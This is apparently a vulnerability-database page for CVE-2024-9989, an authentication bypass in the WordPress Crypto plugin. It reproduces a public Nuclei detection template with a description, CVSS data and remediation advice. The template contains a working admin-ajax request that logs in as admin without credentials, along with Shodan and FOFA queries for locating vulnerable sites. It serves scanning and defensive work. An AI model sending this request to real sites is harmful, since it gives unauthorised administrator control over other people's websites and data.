CVE-2024-9989: Crypto <= 2.15 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Crypto | POC: 已公开

漏洞描述

The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

PoC代码[已公开]

id: CVE-2024-9989

info:
  name: Crypto <= 2.15 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due a to limited arbitrary method call to 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
  impact: |
    Unauthenticated attackers can bypass authentication to log in as any existing user including administrators if they know the username, gaining complete control of the WordPress site and all its data.
  remediation: |
    Update Crypto plugin to a version later than 2.15 that properly restricts and validates method calls in the crypto_connect_ajax_process function.
  reference:
    - https://github.com/wy876/POC/blob/main/WordPress/WordPress%E6%8F%92%E4%BB%B6Crypto%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CVE-2024-9989).md
    - https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9989
    - https://github.com/advisories/GHSA-hmfh-w3mx-w6j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9989
    cwe-id: CWE-288
    epss-score: 0.92504
    epss-percentile: 0.99724
    cpe: cpe:2.3:a:odude:crypto_tool:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odude
    product: crypto_tool
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/crypto"
    fofa-query: body="wp-content/plugins/crypto"
  tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/crypto")'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: set_cookie
        words:
          - "wordpress_sec_"
          - "wordpress_logged_in_"
        condition: or

      - type: word
        part: body
        words:
          - "error"
          - "false"
          - "success"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f4436aa09450047c102902b92520181593c18dc75caf48c9d9a1b7ab782d2e4b022068322ad846129637a1772e35e923fa9e4be4c421a4adab8e17d007331d48a3b2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9989.yaml

相关漏洞推荐